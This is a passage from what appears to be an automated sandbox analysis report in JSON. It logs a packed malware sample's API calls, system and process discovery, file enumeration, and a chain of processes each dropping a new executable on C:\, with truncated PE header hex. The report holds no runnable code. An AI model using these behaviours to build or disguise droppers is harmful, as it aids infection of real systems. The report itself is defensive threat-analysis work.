000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006016)\n \"4262848.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004001b0d94001abd94001000000000000000000002800000000011ce312000000000080f0120095e12677ba441700feffffff435c2a7750592a77aa000000b8000000aad94001a8d94001a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c297760d84275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2a77d2d94001a06a007586000000a4e41200dce812000000000086008800a06a0075a4e41200916c0075d2d94001a06a0075a06a007514e9120002020000 (UID: 00000000-00005936)\n \"4262848.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005936)\n \"20484.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003884)\n \"20484.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000043018853430183534301000000000000000000002d00000000011ce312000000000080f0120095e12677b34b1700feffffff435c2a7750592a77aa000000b80000008253430180534301a4e41200dce81200000000000000000000000000000000000000000000000000e014000000002d001c5c297760d84275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2a77aa534301a06a007586000000a4e41200dce812000000000086008800a06a0075a4e41200916c0075aa534301a06a0075a06a007514e9120002020000 (UID: 00000000-00003884)\n \"20484.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003884)\n \"806288.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004216)\n \"806288.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000550020c555001bc55500000000000000000000006100000000011ce312000000000080f0120095e12677644c1700feffffff435c2a7750592a77aa000000b80000001ac5550018c55500a4e41200dce8120000000000000000000000000000000000000000000000000000150000000061001c5c297760d84275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2a7742c55500a06a007586000000a4e41200dce812000000000086008800a06a0075a4e41200916c007542c55500a06a0075a06a007514e9120002020000 (UID: 00000000-00004216)\n \"806288.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004216)\n \"hrrrr.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"4822004.exe\" called \"IsWow64Process\" with parameter \"6044\" - (UID: 00000000-00006044)\n \"26224.exe\" called \"IsWow64Process\" with parameter \"5968\" - (UID: 00000000-00005968)\n \"226242.exe\" called \"IsWow64Process\" with parameter \"5996\" - (UID: 00000000-00005996)\n \"484648.exe\" called \"IsWow64Process\" with parameter \"6016\" - (UID: 00000000-00006016)\n \"20484.exe\" called \"IsWow64Process\" with parameter \"3884\" - (UID: 00000000-00003884)\n \"806288.exe\" called \"IsWow64Process\" with parameter \"4216\" - (UID: 00000000-00004216)\n \"hrrrr.exe\" called \"IsWow64Process\" with parameter \"6088\" - (UID: 00000000-00006088)\n \"vvvtjhp.exe\" called \"IsWow64Process\" with parameter \"6124\" - (UID: 00000000-00006124)\n \"lpljbv.exe\" called \"IsWow64Process\" with parameter \"4328\" - (UID: 00000000-00004328)\n \"rjldjr.exe\" called \"IsWow64Process\" with parameter \"2288\" - (UID: 00000000-00002288)\n \"ljlpvrx.exe\" called \"IsWow64Process\" with parameter \"6072\" - (UID: 00000000-00006072)\n \"2046660.exe\" called \"IsWow64Process\" with parameter \"3748\" - (UID: 00000000-00003748)\n \"jtjnrb.exe\" called \"IsWow64Process\" with parameter \"4464\" - (UID: 00000000-00004464)\n \"nxlhfx.exe\" called \"IsWow64Process\" with parameter \"2804\" - (UID: 00000000-00002804)\n \"pddnp.exe\" called \"IsWow64Process\" with parameter \"2380\" - (UID: 00000000-00002380)\n \"60202.exe\" called \"IsWow64Process\" with parameter \"4244\" - (UID: 00000000-00004244)\n \"24826.exe\" called \"IsWow64Process\" with parameter \"2412\" - (UID: 00000000-00002412)\n \"hpdphl.exe\" called \"IsWow64Process\" with parameter \"3272\" - (UID: 00000000-00003272)\n \"vfdxfvl.exe\" called \"IsWow64Process\" with parameter \"3620\" - (UID: 00000000-00003620)\n \"4022682.exe\" called \"IsWow64Process\" with parameter \"2736\" - (UID: 00000000-00002736)\n \"6244848.exe\" called \"IsWow64Process\" with parameter \"4072\" - (UID: 00000000-00004072)\n \"rfbfjv.exe\" called \"IsWow64Process\" with parameter \"564\" - (UID: 00000000-00000564)\n \"bjvtfxj.exe\" called \"IsWow64Process\" with parameter \"4228\" - (UID: 00000000-00004228)\n \"4622600.exe\" called \"IsWow64Process\" with parameter \"2796\" - (UID: 00000000-00002796)\n \"08622.exe\" called \"IsWow64Process\" with parameter \"2744\" - (UID: 00000000-00002744)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter 4822004.exe (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter 7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005920)\n \"4822004.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00006044)\n \"4822004.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006044)\n \"4822004.exe\" called \"FindNextFileW\" with parameter 26224.exe (UID: 00000000-00006044)\n \"4822004.exe\" called \"FindNextFileW\" with parameter 4822004.exe (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"4822004.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"26224.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"226242.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"484648.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"20484.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"806288.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hrrrr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vvvtjhp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lpljbv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rjldjr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ljlpvrx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2046660.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jtjnrb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nxlhfx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pddnp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"60202.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"24826.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hpdphl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vfdxfvl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4022682.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6244848.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rfbfjv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bjvtfxj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4622600.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"08622.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has an entrypoint in section \"UPX1\"\n \"20406.exe\" has an entrypoint in section \"UPX1\"\n \"486604.exe\" has an entrypoint in section \"UPX1\"\n \"2028060.exe\" has an entrypoint in section \"UPX1\"\n \"dprdh.exe\" has an entrypoint in section \"UPX1\"\n \"nfhppl.exe\" has an entrypoint in section \"UPX1\"\n \"4080282.exe\" has an entrypoint in section \"UPX1\"\n \"vjntv.exe\" has an entrypoint in section \"UPX1\"\n \"bpfndvl.exe\" has an entrypoint in section \"UPX1\"\n \"blrpxnl.exe\" has an entrypoint in section \"UPX1\"\n \"pvrjd.exe\" has an entrypoint in section \"UPX1\"\n \"nbdbxn.exe\" has an entrypoint in section \"UPX1\"\n \"tlvnl.exe\" has an entrypoint in section \"UPX1\"\n \"dtrfjn.exe\" has an entrypoint in section \"UPX1\"\n \"lvttpxb.exe\" has an entrypoint in section \"UPX1\"\n \"lxvdh.exe\" has an entrypoint in section \"UPX1\"\n \"jbbxlvh.exe\" has an entrypoint in section \"UPX1\"\n \"4408646.exe\" has an entrypoint in section \"UPX1\"\n \"86668.exe\" has an entrypoint in section \"UPX1\"\n \"08086.exe\" has an entrypoint in section \"UPX1\"\n \"624642.exe\" has an entrypoint in section \"UPX1\"\n \"48064.exe\" has an entrypoint in section \"UPX1\"\n \"lxdxh.exe\" has an entrypoint in section \"UPX1\"\n \"hltjhx.exe\" has an entrypoint in section \"UPX1\"\n \"fnlpb.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" wrote 16102 bytes starting with PE header signature to file \"C:\\4822004.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4822004.exe\" wrote 16120 bytes starting with PE header signature to file \"C:\\26224.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"26224.exe\" wrote 16134 bytes starting with PE header signature to file \"C:\\226242.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"226242.exe\" wrote 16152 bytes starting with PE header signature to file \"C:\\8402624.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8402624.exe\" wrote 16172 bytes starting with PE header signature to file \"C:\\484648.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"484648.exe\" wrote 16187 bytes starting with PE header signature to file \"C:\\4262848.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4262848.exe\" wrote 16200 bytes starting with PE header signature to file \"C:\\20484.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"20484.exe\" wrote 16218 bytes starting with PE header signature to file \"C:\\806288.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"806288.exe\" wrote 16229 bytes starting with PE header signature to file \"C:\\hrrrr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hrrrr.exe\" wrote 16240 bytes starting with PE header signature to file \"C:\\vvvtjhp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vvvtjhp.exe\" wrote 16260 bytes starting with PE header signature to file \"C:\\fvbll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fvbll.exe\" wrote 16273 bytes starting with PE header signature to file \"C:\\lpljbv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lpljbv.exe\" wrote 16293 bytes starting with PE header signature to file \"C:\\rjldjr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rjldjr.exe\" wrote 16308 bytes starting with PE header signature to file \"C:\\ljlpvrx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ljlpvrx.exe\" wrote 16319 bytes starting with PE header signature to file \"C:\\bfbfxx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bfbfxx.exe\" wrote 16331 bytes starting with PE header signature to file \"C:\\2046660.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2046660.exe\" wrote 16347 bytes starting with PE header signature to file \"C:\\40484.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"40484.exe\" wrote 16367 bytes starting with PE header signature to file \"C:\\jtjnrb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jtjnrb.exe\" wrote 16383 bytes starting with PE header signature to file \"C:\\pvtnp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pvtnp.exe\" wrote 16395 bytes starting with PE header signature to file \"C:\\nxlhfx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nxlhfx.exe\" wrote 16413 bytes starting with PE header signature to file \"C:\\pddnp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pddnp.exe\" wrote 16433 bytes starting with PE header signature to file \"C:\\tplfhb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tplfhb.exe\" wrote 16448 bytes starting with PE header signature to file \"C:\\60202.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60202.exe\" wrote 16458 bytes starting with PE header signature to file \"C:\\6260866.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6260866.exe\" wrote 16472 bytes starting with PE header signature to file \"C:\\6686484.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6686484.exe\" wrote 16488 bytes starting with PE header signature to file \"C:\\24826.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24826.exe\" wrote 16503 bytes starting with PE header signature to file \"C:\\hpdphl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hpdphl.exe\" wrote 16513 bytes starting with PE header signature to file \"C:\\vfdxfvl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vfdxfvl.exe\" wrote 16531 bytes starting with PE header signature to file \"C:\\4022682.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4022682.exe\" wrote 16541 bytes starting with PE header signature to file \"C:\\6244848.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6244848.exe\" wrote 16553 bytes starting with PE header signature to file \"C:\\rfbfjv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rfbfjv.exe\" wrote 16565 bytes starting with PE header signature to file \"C:\\bjvtfxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bjvtfxj.exe\" wrote 16576 bytes starting with PE header signature to file \"C:\\jtlftjr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jtlftjr.exe\" wrote 16596 bytes starting with PE header signature to file \"C:\\lrbtfbt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lrbtfbt.exe\" wrote 16610 bytes starting with PE header signature to file \"C:\\tnxhl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tnxhl.exe\" wrote 16627 bytes starting with PE header signature to file \"C:\\4622600.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4622600.exe\" wrote 16639 bytes starting with PE header signature to file \"C:\\0400068.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0400068.exe\" wrote 16651 bytes starting with PE header signature to file \"C:\\08622.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"08622.exe\" wrote 16664 bytes starting with PE header signature to file \"C:\\24808.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24808.exe\" wrote 16674 bytes starting with PE header signature to file \"C:\\880446.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"880446.exe\" wrote 16689 bytes starting with PE header signature to file \"C:\\ftpltv.exe\": 